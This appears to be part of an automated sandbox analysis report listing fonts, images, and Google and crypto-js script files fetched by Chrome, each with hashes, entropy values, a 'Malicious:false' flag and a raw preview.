                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):62168
                                                                                                                                                                                                                                        Entropy (8bit):7.9960533178590225
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:Tx9sE8Uyqjc6T82ICJZ5VwyMSjpXh8mYilPu4+DdKzpw+iqZwMDH:t6c3jc6T82ICJ3V6I24+DI1w+NX
                                                                                                                                                                                                                                        MD5:C88DA33CEC75404EF947F3AA133B5611
                                                                                                                                                                                                                                        SHA1:A500A264783BF1A4604F8B42AAE8BF0E4C4B8815
                                                                                                                                                                                                                                        SHA-256:61DD37140E07D05BAD405557D1C30856058F551FC7FFF4112A09389285719669
                                                                                                                                                                                                                                        SHA-512:04AC1DB2180C4DCDE5E4E51042824DE0E9A20420331CBA140570633029F88AC8FE59A818B6EB4407BC278741FA83C6037A5B649E6F8EFF777CC8E9C6FE187344
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/spectral/v14/rnCs-xNNww_2s0amA9uCt13D.woff2
                                                                                                                                                                                                                                        Preview:wOF2...................s..............................T....`.....d........X..B..x..6.$..l. .....K..o[.o.Dk.m/.W.T...*O;EJ~p.VM>..0EV>....)R(...u...pgo..V%.A.;...........5.........h.O...<m.....h.b.*.J"s..T.M...f..Ku............>.a.g.+.G:x..|NYY......U...ym...F..J.../.....M.<l.e.R........G..,.6&9.r.M#uMY....*k.a..Y(.%.....\..3.`..c....T(.v..f.].Q.POB.z.y....K... .u~..U.....+Tr.(Y?......H..M....Z-T>..+NJ.#.;.#,.br5..sxX........../,P...*.O.L.&F......Q..._C.qu...r.W>......K{8......].n.[.v.W..J.|.....4*40.,[,.?....'b.f...@...%..\.B.V......)O2./.>..7.)T<..$.xz....QK.Q{..EF...P..NH.Gx....D..x.b....%..b..uf%..X....N.^.N..wE..9kt.._.7uso"!....&..O..V..'.LmX..r)mp....&..|....(.M...gpW.;..E..~?.\{.....f...........n..P,\Y......0....U.Q#..)..Z."....@..H. z..Qs..XA..e.f.5......^..[..TH..N$.+@.U.....T.K..g...<<y..?_....Y.)f..8.1cF.=si.Y[[.rs.nS0.Z....#..._..\.XL+......B......[.AQ..h.w$.....x,..ZEUme... .3.Kt.s_o.......a.........K^....T.*u......b.I........n.2R5.X
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 59248, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):59248
                                                                                                                                                                                                                                        Entropy (8bit):7.994852785932296
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:0sNhKSeCshb3BshrezfaFGziakHEYTVLWROFsXCnNv:a3d7aFGeRwR4v
                                                                                                                                                                                                                                        MD5:1AF9E819961450561E83CAC6EEB7DA3F
                                                                                                                                                                                                                                        SHA1:C095AF8B74E986B2A8C31612C152AEB1BBCAD527
                                                                                                                                                                                                                                        SHA-256:44E1A7E76DDC65B9E7950B636D912348BE949BC1618F51B1E549218293FDA5AE
                                                                                                                                                                                                                                        SHA-512:D5687A98427D2383723CB1C5792B39E6236B751B08099D9F85F723E4172007609E374777B73C1FB837534BDCBB2FF74D615E74F28C3BB17236EEEFBCFE74D974
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/spectral/v14/rnCt-xNNww_2s0amA9M8kng.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......p......................................x...>....`.....d........\..F..x..6.$..l. ..,..K..o[#t......~.....*..J....o.oE....e.p...j.y.y....F.K.^.............K...#...Q@.U.......*9.BL>..e..W...[...5..8q.J....D.{..'..NC.g...{....n.y.."...E.d.4R.+&.)......<...M..T.....j..%{.....C.w. p.F:..*.3...n...I....^.7...........q}..PZ.2Gz...)...!.?...\.6(....!.Z+JIy.H..v....E.cdg.....C....H..._..p"..&w..1..Gz.bz A#>.....(ZKV.&.+.l.p.....(./y.=k6.T1.i0...'.F......oZ.>....VsYf.M.J<..*<.3E.L.U.Q......7..U.'Fim..*S..m..[.............S..p%.....d...:a.p..O..."L<.=S...{.V]..lX........<.$....HQ.^"\......*R.......{..,.|.Q...>....W,.....|a0.JK.;6sb....=.@.gkb..x.....d...-..[.s.cRMXl.....s.O.$..?.&...Z...v.....s.{..$|.......X..b.t..b....G..{?....s.N.....'..;.\.) m......s...`.....(XT0j.(QA...1..D...^y..S/..rx....Q.=..3..8..t..<E-..eT....Q...j9dA .aD...o{.....=^......A-...^",.!..a....B.c.fg.E..(.O.(V..F.tH.J.....N.....F...s..=.8.T....?^....&A=....lM..UV][
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):48316
                                                                                                                                                                                                                                        Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1862)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39989
                                                                                                                                                                                                                                        Entropy (8bit):5.5692932854509785
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:HSvDieYI0ORrsgvk3SmckV9Lg22Lch6RNBoQ2J8GDqw8kDJbYyWNmGx6M7Fv8di1:yvDRsgdTb0SN/GXFCmQ3FvoiOsHEFU
                                                                                                                                                                                                                                        MD5:FA27C359D60B5B52488C247E8BA79342
                                                                                                                                                                                                                                        SHA1:0EB0187702C68CDB1EB3DDCCC5F9F551191D02F2
                                                                                                                                                                                                                                        SHA-256:DC52E949FDEA807F5F3AA7E4A056B5EA870F5D4747F21EE3742740F9DFB20E96
                                                                                                                                                                                                                                        SHA-512:1C56F8C2721A8AF3C1D032B5745CE09C553E1DD58FCCB30292BE1E5F44B8C7A476444FBE070D2B4BA77A0AB0FB2EA3B72041B7E5A3AB98250BA593A9D5CA7CDC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:mK(Ueb);.var ZBx="docs-mic-palette-body-active",$Bx="docs-mic-palette-body-hover",aCx="docs-mic-palette-focus",bCx="docs-mic-palette-help-hover",cCx="docs-mic-palette-recording",dCx="docs-palette-dictation",eCx="docs-voice-bubble-close",fCx="docs-voice-bubble-heavy",gCx="docs-voice-offline-bubble",hCx="https://docs.google.com/reserved/spoken_emoji",iCx="https://docs.google.com/reserved/spoken_punc",jCx="https://support.google.com/docs/?p=voice_typing",kCx="stopped";Rsq.prototype.D=X(1762,function(a){return vYb(a)});.DT.prototype.QXa=X(1545,function(a){this.D.uIa=a});ptq.prototype.QXa=X(1544,r());Zff.prototype.H=X(1265,function(a){a=a.target;for(var c=0;c<this.D.length;c++){var e=this.D[c];e&&e.Ba()&&kJ(e.Ba(),"docs-palette-top",e==a)}});YZc.prototype.xOa=X(550,function(){return!!this.D.H});zsd.prototype.xOa=X(549,function(){return this.D.xOa()});YZc.prototype.sCa=X(548,function(){this.D.ix()});zsd.prototype.sCa=X(547,function(){this.D.sCa()});.YZc.prototype.rTa=X(546,function(){var a=t
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):53637
                                                                                                                                                                                                                                        Entropy (8bit):7.99060895641039
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:8+i2VYFwLKNwEnDDvb0tgrruEVhbXB+OFA8LVzRb5JtyCSdGWMgljCw:8+iFk6webbruEnaEVzV5VSCgdCw
                                                                                                                                                                                                                                        MD5:ED16592A50EEEDA2166D931043D629A2
                                                                                                                                                                                                                                        SHA1:F0D9D469C531A06072496D789759AF92588C3E25
                                                                                                                                                                                                                                        SHA-256:94BBC776DA08F88AD32B29E3F8952EA41D96CB6C038ECFC504BCD0132F004D02
                                                                                                                                                                                                                                        SHA-512:A21E95B027573D8C49E75873ABB7084CD4A704996734AB087D63ECD5807F2601AC4938B1059096D94AB66CF22E8529194B63F12F3DBC7A208E3AED380DAD2E73
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(...LIDATx......... ...s|B.R.'R.a......VX...8..Zr..WU'..k?.k..m.m.}.l..[.^.Q...L...l......S]lTWg<(.U.{.k03...".@B...CB@D..q..z.,..P:l"(@DkPQ.Gd......<Fk-.%..{(.3FvR..fV.V..<.....e(.,a..X)~i. 1.\..&.O.u...c..J*Kaf.5...k.!#..4D.0H..P.H.K.Jy.X....'...}.....>@3I...g........$?0..=e ..(.... .[f..5....FF.&......{.c..q.....1I.c.3.<?b.....>c...[...l,m[...:{.!Sk...e.*}.a3.-......C...q.a....@=.I.GiH.zT.%.KA.v..i;......N.U...}6.0..V.l.l..',%.MX......w$?Zk}FN.8f..Z..>8....3.a....=*J7.xR...s.....A).D.}......n.... 1".C0,.X.(.VQ...+..R..U..$,..N..mI...S./(.B....(.......~..|3i6.&.*...6>.o\.}..p..0.O..w.\......M.^...u..d.>.AIXo4..j....Z.]t.GU..99p.....!.Zsu.2.8....<.ooE...L.....?..c...<..#p>.B.~....z...7.v..y..P.:s.OX+..,"Rg..F"t........dV:...v3..;.m...,...l.*.7.(A..b.d...g.:.......mS..4]JK.I(...{.K..u...O..[..>....".<.U......v.......,~J.... e.d.......R....i..x.....3...tO.!..N!...d.,Q.._|..G.s#..I...............?..|]..#...!as.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 37632, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):37632
                                                                                                                                                                                                                                        Entropy (8bit):7.994612552386459
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:j3igNBn3RfzwBFOw6FZ5kUezAtdnMlWCTd18T8b4Coa/a5oUO3ULsegB45r:j33B3BaFO9FEUiATWT8T8bAaCeBEJh
                                                                                                                                                                                                                                        MD5:1FFAA430DEB705DF128762D9990F8EFE
                                                                                                                                                                                                                                        SHA1:847F8CA1CF199A602AEF0EF42AEBF5F825584E19
                                                                                                                                                                                                                                        SHA-256:2706DFABCBAAF2DEE90C3A10C168D5F5691CE787DCAE9E77CD038F66B08FC4BA
                                                                                                                                                                                                                                        SHA-512:24B0B6016AAFD2C96C5110B4EB19FDB965E4F12007552E710B33F38E7621F3329D28570BA40E25041E17FE27624DE52294890585836590B509F2BF28DD92736D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotomono/v23/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_3vqPRg.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............7,.............................4.`?STATH..`.....p..n..r..6.$..r. .........A.'.m.....h.j..a.......II.k...q........d#.<x=..|S3..@..;..#....J..p.xx.<..R.....E].&..*.R.....L....6*k..(x.E."H....v.A...x[...1...Z.G....j....q.).....W.D.pe..w.8..M...{.|....G...KlS..2.vi3DC...<.......b.$.n... ..J0gx~..N....M..S=....j..w....b%z.7Q[.....6......y...(x..3...y.~*..Q..0.l@.c.c...t.17.......X..f.Q..z.7...r........,..-..x.+A..I"..M.i..?..?|..).J7.F0......U.....z..i3..:%.X.0%.'...7..v{.......hCz..y..8u.....!.......`.z..../.=S.Jh...P.....T.&n%V[..sp^.aB.A.k.....f.8..n.i^[1#[..........d......-.....ST.}gN......ZK.Z. /I..b.H..4.y...m...g..#.GI.s....F8..d...V..L.........i.....g${.......t..Q..M...s...u.%K...|..0.6...|..<......6.....;.0".....P.x.y..y.\P.B\.......e6..Y.nq9.v*$....=....'....?...B....d9E.....,f9.....b..d+\..S.k|].d.\Y..>.9..[..f.=c]...36.$,~UQMU.@.`0..c......4.Z.v..s.KkM.^..^..E......?Uu......{...0..K...i.6B..A..I5..I.....|..LN.-k.....1.jPu.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 43772, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):43772
                                                                                                                                                                                                                                        Entropy (8bit):7.99497933742288
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:nl5ER4tVdeSUthhWfoDHea0tGdFOIHPyCdHLBdv6pGXw9XozpskEePJBsfJM3V:WO00uea0twFO2TdrBgpGg5wtBBsfJMl
                                                                                                                                                                                                                                        MD5:36338672609C9EC1D83AF4E1AFF7B0AD
                                                                                                                                                                                                                                        SHA1:287BF3611440E9377DD71C0620AA63448D632F06
                                                                                                                                                                                                                                        SHA-256:E268433F792E81D03D24617E0A4D6ECB5728278A805E7D12493E06802AA671A7
                                                                                                                                                                                                                                        SHA-512:6A4F62F6BFB02679F2887CB62E1BAB06F5FAFEB80BA44AED733ABFD0FBD1F8EAF545316958CC8D5FD74E6685D68CDC1BC037FA02810FFF98BC9EB95719DA7A1C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/playfairdisplay/v37/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_k-UbtM.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............................................d...$..f.`?STAT@..t.....l..=..\..6.$..4. ........[.{..5.....+..kL.J.....)x.].....J..'...R.........IE.K3.vcx.....Bp..G.:D..UT...{C......P@F..r8+..d.!Si.$..F..7..v...{.>..+u..u..,v.g.J..%g.%.D%*Q).^2..n....JT..jF.7C..H..8...d..D.V".&...|>^[.e.l...J.YYD0W0_..n..ulm..y..2...M_<.b'3H..'..+Yb. .w#..h..o.1.coJ........)mO..s....!'J^D....KC.,sa-.?.../*Q....3....o.......g.....t).y.=..U.%o..q#k*.&_.?C..ff....8.82..W..0...D.V@..$-.BZ.$JE.8...<*D....@.m....%.....w..rw.jr.XP1.H.Q%.. ...."..H.(.X..-...A....q...v.....]K....D.QB.Eb.q..</.....y..G..<v....w1/W1*.i...O...sU....P.z.L{.K4.T.I.po.^g...]....JK..7}......._x.7.g.a.w.%..r....`..+5.a...*.>A=......H#1...s.58/..d....#....-?l.[y.........i...p.x....@@.v....AhF4...!........A.....}._.........V.J.(.D(.R.G!.RPa...? .W...Wo......%5h......Q....J#ZI..oN.......I../......K..(...)@....h.R.+...9.9...C.Q........z.u.DI......L..7.p.{...l*J.&..y!.I..C......W..vEk.....k.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):66034
                                                                                                                                                                                                                                        Entropy (8bit):7.993242989760179
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:yJjgGU8fyLpSca+Q0r38GM9Pho9mjAkh/HXkbal1hDpKv3IC:hGU8fy0cV8fi9YhPb1HC
                                                                                                                                                                                                                                        MD5:ACF75D7BF4A84D85F8CCC0945FAAA71B
                                                                                                                                                                                                                                        SHA1:C37DF6E707BE5AB783C7EC844E42F7C621C516D3
                                                                                                                                                                                                                                        SHA-256:B2158679569F4CF65197146AC0CFDB4ABE9E496403F167816A03C0ABDDCA26E6
                                                                                                                                                                                                                                        SHA-512:DD2E516215A7C19D35E2DD5323886313B07795674CE8977337B8EC89C1A9AA54759373F761688692B67D698A87315CA25F8A98F38BE66D1EDC218AB6882148F6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1yUWZO6Mfzg-J9mGf-LGnqDfq0ntd0qxmPxrhm5XSz60_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...1..... .G.EK.xB....x.. ,.a........a...@X..... ,@X..... ,.a............@X..... ,.a........a...@X.......@X..... ,.a....... I.BX.;v.. ..q........{..X.&{....{..m (h..Y,..Lw...e.|./]..>n.I.R.F.qR.y.....y..".2D._a.,....iJ..RZJ..t.(.,..:..{..2D...vB.0..e.e]W...`]...Eq.i.]...4.8......b..>......,.$I....xa1.........{WU...:...{V..!.D.A....% %P.%RH.......... %.}|........g.7...1M3..<...M.8.!..kR.$........<...+8..i.(.m.q.4M.a.....3.C..}...q8.<.}O...\@.e.N...y^UU..s1.8R..8..,.....0...8&.E.JCcQ.eY.<z...:...Sx..a.90B..3.-8....(..i.(.O..*.;H..X.e.'.p.6.u1....\.$..,K.q.u/v..S@ ......B.CZA...6.(...%h........ .>......9.61......'.i.q,I.k..C%..2a.F........0T.....EQ._.y6M3.#..UU.,.u.V0..e.pkE...}...y..yUU.A..kY...m.....eYy.c.\.........wX. ..VD.u.}._9..q..VO..}.k+0M.m.x(.jg<.{...E..'.Q...)...}.~..X<mEjK..:.{g8.lE..P..u]...........a..H.#..#b!...B2Yl"e`6....n.'{../...W.z.. ..\...x..{.y............."......l.r.P(..F.v........2H.5...%
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 5044, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):5044
                                                                                                                                                                                                                                        Entropy (8bit):7.951901332858743
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:9gXfiL8sKiR//gg+2nyE6gbhIs64Ib/i8E66d2Rt+6TRtzBr886h:WPehKiRXgg/nEuk4k6366dS+6TDBrU
                                                                                                                                                                                                                                        MD5:5E37F6030CF935F9CBD3FF5A22E08D2E
                                                                                                                                                                                                                                        SHA1:C77AE7DD7501F4F578884BC034004F8619FC3D17
                                                                                                                                                                                                                                        SHA-256:867352B1C82C47D71A11744E3886441A848780DCA87928BAC596E5F3473BFAA3
                                                                                                                                                                                                                                        SHA-512:32D2C92FE4A8EA3A5DA9F103F6E36CF035804F529DD488A593A700566FF14A1B6F2A02AB9527818F7891DB88C6DAF5451251D21A6C8CD2FAA637884D142D3C08
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/pacifico/v22/FwZY7-Qmy14u9lezJ-6B6Mk.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............)`...W............................h....`.t.................6.$.X. ..r..*..K..&#........<./...1.x."..T.Vx..j.)...UUoG....@..X...d.~.W....l.3H.Y.e.......+?RX.(.Z.#.....#.i...y.~?...x.M...7..%..D"$*.....i..).25f..2.........f..%.ifB..mQc....2=4%]I.....WWrQ%..(..g.......k..o.z..]...$`....._....Y"..Y8b.......(m..O..WM:...1."...H..r...B..!..sN..,%In.P....1pH.$.i.g. .+K1.V..{%. ..A....l9.x.P...'..W.$...B......M.5W...j.3..gc%..zk4.[.E............m.q.6G@DT.Q..S...5vY3j.!....i...h...=.Ox..._9Q$WPX\..2..<..R+qYG..H..K./.F^}.....=.\/W<.6.....4.l.\t.......^.Q...Q....`.Hn.Y..Z.BI...eCP.......\....f|w......5..^..eK~\~p.....$!....S3.....-..e@w.....2..f.W....`?d.'...........)(..8^.cO.}.f\.(...[.;q[.Q..e.wR./S.@q......q.l..q.z..m|.p.H....9...W.....-...5..ZB:.......YV.jC....[.....7...n;m.d.I.F.ly...O.bW.R.d....c..M...^v9[j....'......r.z_......7./...~A....W.|Mci...Q.7...9.A..i...\....2.`.W_ ....6...()..s....7.\..j.....@o....m....w...6.....,
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1555
                                                                                                                                                                                                                                        Entropy (8bit):5.249530958699059
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:hY6svN/6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z1sW:3qN/2+pUAew85zf
                                                                                                                                                                                                                                        MD5:FBE36EB2EECF1B90451A3A72701E49D2
                                                                                                                                                                                                                                        SHA1:AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
                                                                                                                                                                                                                                        SHA-256:E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
                                                                                                                                                                                                                                        SHA-512:7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67606
                                                                                                                                                                                                                                        Entropy (8bit):7.990423651927193
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:igVbP+lk4CGoDOyseXFVr8MsPXSIRlK8T12Req4vSOPJUfbOKhjYrTOhHdgr:igVb+lkxDO6XFVoV3KgEeq4301h0HOxi
                                                                                                                                                                                                                                        MD5:0336C790895777BA2F7FAA1DAD5879E3
                                                                                                                                                                                                                                        SHA1:4F7D97C9F479FA529A2E7FCF832285D8A0DAD410
                                                                                                                                                                                                                                        SHA-256:ED362E81898689DB68073DE710698EB412A79C6296F8890B27E0C38EEAF8C5CB
                                                                                                                                                                                                                                        SHA-512:0AE860C90AFFDCF35B93E80F72467053B1800CB3F36695C15D25D8B5B4A5ED7FD6D2921CB9096517DA59C1A3F8216130571DA35290741CA0184FE310C640FB02
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx......... .Os....E.. ,@X..... ,.a.......A..?....=cm.?.J..B=.~.f....K...|.;.Y.#.K*.Ln.91...t....TG..B.(.1...[.+.F.._.C.J..d8b:.j-..a;.|....(.P).j{....g..tc9.(.?Jr..l....B./.7{.U..H.VuuQ.....(d..f........Bb!.......^..j.+F.`...?/v.S.R\(.1.!....Qu..Ump..]+Z/...?tg.V..yJ.......k2.s....(m.n...V...*.'....th+.}....+..S.<..qz5./v....zo....3.........o...3.%.X....Xd....k^nt....m.8...B..........M}|U.^T.sv......Y...\....8..6...y.D*..V...QH{~'..HEtE...$j.X%.98.H6.....k....d..'.6....=M.....K....q.[u....SUV.Vn.\.S. ?.$.<9pf..v...M.+...OE.y8.u9.n.E.r`....Q.a.E!b..M.{.-....Mu.#........7.....m.7..4.uH......G....MH..>~....f.t.....V.......`YI}r.a.+.D...6-uv[../.a.&+..^/q[:..k...=.......={.^/....8... .p.`..m7:'...(..icD...%3{..JO'...!...$..j...5$U(J..TJX..5..5c...oOcj..(...cU\*..._....;.D.j..D.)....2..xT..(.G....".S..y...h#.......Ogv.zW..9.N7.'N..L...X...=d.Y.L~vz.}.q...$........*.P....g.....<T..HK.Du.J...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1820)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):55057
                                                                                                                                                                                                                                        Entropy (8bit):5.513499368874619
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:1tVJGVloLBB/sAn5HjyR6IHoaihLv8kjbkuSyQcfvXswNgPJHzsH6KecOk/si57b:H1LB15HjyRDQv8DIlKm0eTOOF
                                                                                                                                                                                                                                        MD5:FB5ADA04588AA317BFDAA5DDF13B8A15
                                                                                                                                                                                                                                        SHA1:9EB9680A9B375BC57615982CBB46FEE1C468CBBE
                                                                                                                                                                                                                                        SHA-256:D9219A107DF46A54E3FD25E751B201BDE976A4E7B45D941AC0746CAFC5A8FAB9
                                                                                                                                                                                                                                        SHA-512:F7655A2B64090D3634E41FD773DE047D0DDBED3F29427C1BE9EE06EA4D61AC794F3A12FF3ADCA0CADC03A04654C09C91431DD7716F39E1A251D64A911305F9F4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=card/exm=client,gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_2"
                                                                                                                                                                                                                                        Preview:gapi.loaded_2(function(_){var window=this;._.bs=function(a){return"rtl"==_.Or(a,"direction")};_.cs=function(a,b,c,d){this.left=a;this.top=b;this.width=c;this.height=d};_.g=_.cs.prototype;_.g.clone=function(){return new _.cs(this.left,this.top,this.width,this.height)};_.g.intersects=function(a){return this.left<=a.left+a.width&&a.left<=this.left+this.width&&this.top<=a.top+a.height&&a.top<=this.top+this.height};._.g.contains=function(a){return a instanceof _.Dr?a.x>=this.left&&a.x<=this.left+this.width&&a.y>=this.top&&a.y<=this.top+this.height:this.left<=a.left&&this.left+this.width>=a.left+a.width&&this.top<=a.top&&this.top+this.height>=a.top+a.height};_.g.distance=function(a){var b=a.x<this.left?this.left-a.x:Math.max(a.x-(this.left+this.width),0);a=a.y<this.top?this.top-a.y:Math.max(a.y-(this.top+this.height),0);return Math.sqrt(b*b+a*a)};_.g.getSize=function(){return new _.md(this.width,this.height)};._.g.getCenter=function(){return new _.Dr(this.left+this.width/2,this.top+this.heig
